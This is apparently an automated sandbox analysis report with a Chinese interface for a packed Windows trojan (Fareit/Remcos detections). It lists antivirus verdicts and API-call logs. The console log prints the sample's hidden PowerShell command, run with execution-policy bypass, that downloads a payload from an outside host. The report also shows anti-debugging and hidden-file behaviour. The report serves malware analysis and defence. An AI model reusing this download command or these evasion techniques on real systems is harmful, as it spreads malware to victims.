10.6
0-day
52 个模型检测该样本为恶意!
重新分析
更多

6f6784e7f92eab0529d5da3aaa0fed31320ec319b6a6c6beda8341d77113234f

23867decc4f3176a9541bd62ec495bf7.exe

分析耗时

74s

最近分析

文件大小

925.0KB
静态报毒 动态报毒 5GW@A0CWKUNI AGEN AI SCORE=89 AIDETECTVM ATTRIBUTE BUZUS CLASSIC CONFIDENCE DELF DOWNLOADER32 EJUL EKCN FAREIT GDSDA GTCBNV HIGH CONFIDENCE HIGHCONFIDENCE HQBU KRYPTIK MALWARE1 MALWARE@#SF2XND9AS17X R06EC0PIA20 REMCOS REMCOSCRYPT SCORE SONBOKLI SUSGEN TQYQ TSCOPE UNSAFE ZELPHIF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/Injector.9d9b71b5 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Inject-XW [Trj] 20201229 21.1.5827.0
Kingsoft 20201229 2017.9.26.565
McAfee Fareit-FRD!23867DECC4F3 20201229 6.0.6.653
Tencent Win32.Trojan.Generic.Hqbu 20201229 1.0.0.1
CrowdStrike win/malicious_confidence_80% (W) 20190702 1.0
静态指标
Queries for the computername (7 个事件)
Time & API Arguments Status Return Repeated
1619301874.000999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301874.015999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301874.015999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301874.031999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301878.390999
GetComputerNameA
computer_name: OSKAR-PC
success 1 0
1619301878.390999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
1619301880.062999
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Checks if process is being debugged by a debugger (1 个事件)
Time & API Arguments Status Return Repeated
1619301874.578999
IsDebuggerPresent
failed 0 0
Command line console output was observed (20 个事件)
Time & API Arguments Status Return Repeated
1619301871.782374
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619301871.797374
WriteConsoleW
buffer: powershell.exe
console_handle: 0x00000007
success 1 0
1619301871.797374
WriteConsoleW
buffer: -ExecutionPolicy Bypass -WindowStyle Hidden -Command tas;(new-object System.Net.WebClient).DownloadFile('https://share.dmca.gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495')
console_handle: 0x00000007
success 1 0
1619301879.562999
WriteConsoleW
buffer: 无法将“tas”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。请检查名称的拼
console_handle: 0x00000023
success 1 0
1619301879.593999
WriteConsoleW
buffer: 写,如果包括路径,请确保路径正确,然后重试。
console_handle: 0x0000002f
success 1 0
1619301879.625999
WriteConsoleW
buffer: 所在位置 行:1 字符: 4
console_handle: 0x0000003b
success 1 0
1619301879.656999
WriteConsoleW
buffer: + tas <<<< ;(new-object System.Net.WebClient).DownloadFile('https://share.dmca.
console_handle: 0x00000047
success 1 0
1619301879.687999
WriteConsoleW
buffer: gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\238
console_handle: 0x00000053
success 1 0
1619301879.703999
WriteConsoleW
buffer: 67decc4f3176a9541bd62ec495')
console_handle: 0x0000005f
success 1 0
1619301879.734999
WriteConsoleW
buffer: + CategoryInfo : ObjectNotFound: (tas:String) [], CommandNotFound
console_handle: 0x0000006b
success 1 0
1619301879.765999
WriteConsoleW
buffer: Exception
console_handle: 0x00000077
success 1 0
1619301879.781999
WriteConsoleW
buffer: + FullyQualifiedErrorId : CommandNotFoundException
console_handle: 0x00000083
success 1 0
1619301886.203999
WriteConsoleW
buffer: 使用“2”个参数调用“DownloadFile”时发生异常:“基础连接已经关闭: 发送时发生错
console_handle: 0x000000a3
success 1 0
1619301886.234999
WriteConsoleW
buffer: 误。”
console_handle: 0x000000af
success 1 0
1619301886.250999
WriteConsoleW
buffer: 所在位置 行:1 字符: 51
console_handle: 0x000000bb
success 1 0
1619301886.265999
WriteConsoleW
buffer: + tas;(new-object System.Net.WebClient).DownloadFile <<<< ('https://share.dmca.
console_handle: 0x000000c7
success 1 0
1619301886.296999
WriteConsoleW
buffer: gripe/RSlUa63cBf5DkEfs','C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\238
console_handle: 0x000000d3
success 1 0
1619301886.312999
WriteConsoleW
buffer: 67decc4f3176a9541bd62ec495')
console_handle: 0x000000df
success 1 0
1619301886.343999
WriteConsoleW
buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000eb
success 1 0
1619301886.375999
WriteConsoleW
buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000f7
success 1 0
Uses Windows APIs to generate a cryptographic key (50 out of 66 个事件)
Time & API Arguments Status Return Repeated
1619301876.046999
CryptExportKey
crypto_handle: 0x0031eb80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.046999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.046999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.046999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.125999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.125999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.125999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.140999
CryptExportKey
crypto_handle: 0x0031ea40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.171999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.171999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.218999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.218999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.218999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.218999
CryptExportKey
crypto_handle: 0x0031df80
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.640999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.640999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.656999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.656999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.656999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.656999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301877.671999
CryptExportKey
crypto_handle: 0x0031e4c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e3c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.078999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.093999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.093999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.140999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.140999
CryptExportKey
crypto_handle: 0x0031e880
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.218999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.218999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.218999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.234999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.234999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.234999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.250999
CryptExportKey
crypto_handle: 0x0031e7c0
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.312999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.312999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.453999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.453999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.468999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.468999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.468999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.484999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
1619301878.484999
CryptExportKey
crypto_handle: 0x0031de40
crypto_export_handle: 0x00000000
buffer: <INVALID POINTER>
blob_type: 6
flags: 0
success 1 0
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619269230.491633
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
行为判定
动态指标
Allocates read-write-execute memory (usually to unpack itself) (50 out of 161 个事件)
Time & API Arguments Status Return Repeated
1619269229.553633
NtAllocateVirtualMemory
process_identifier: 472
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619301874.140999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 8192 (MEM_RESERVE)
base_address: 0x02a60000
success 0 0
1619301874.140999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c00000
success 0 0
1619301874.484999
NtProtectVirtualMemory
process_identifier: 520
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f31000
success 0 0
1619301874.593999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0279a000
success 0 0
1619301874.593999
NtProtectVirtualMemory
process_identifier: 520
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
base_address: 0x73f32000
success 0 0
1619301874.593999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02792000
success 0 0
1619301874.796999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a2000
success 0 0
1619301874.875999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c01000
success 0 0
1619301874.921999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x02c02000
success 0 0
1619301875.140999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027ca000
success 0 0
1619301875.453999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a3000
success 0 0
1619301875.718999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a4000
success 0 0
1619301875.750999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027eb000
success 0 0
1619301875.750999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027e7000
success 0 0
1619301875.875999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x0279b000
success 0 0
1619301875.984999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c2000
success 0 0
1619301876.000999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027e5000
success 0 0
1619301876.375999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a5000
success 0 0
1619301876.968999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027cc000
success 0 0
1619301877.140999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c3000
success 0 0
1619301877.218999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x05400000
success 0 0
1619301877.390999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027a6000
success 0 0
1619301877.640999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027ec000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c4000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c5000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c6000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c7000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c8000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x027c9000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a0000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a1000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a2000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a3000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a4000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a5000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a6000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a7000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a8000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054a9000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054aa000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ab000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ac000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ad000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054ae000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054af000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b0000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b1000
success 0 0
1619301877.828999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b2000
success 0 0
1619301877.875999
NtAllocateVirtualMemory
process_identifier: 520
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x054b3000
success 0 0
Creates executable files on the filesystem (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\name.bat
Creates hidden or system file (1 个事件)
Time & API Arguments Status Return Repeated
1619269260.991633
SetFileAttributesW
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\23867decc4f3176a9541bd62ec495
failed 0 0
Creates a shortcut to an executable file (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
Creates a suspicious process (1 个事件)
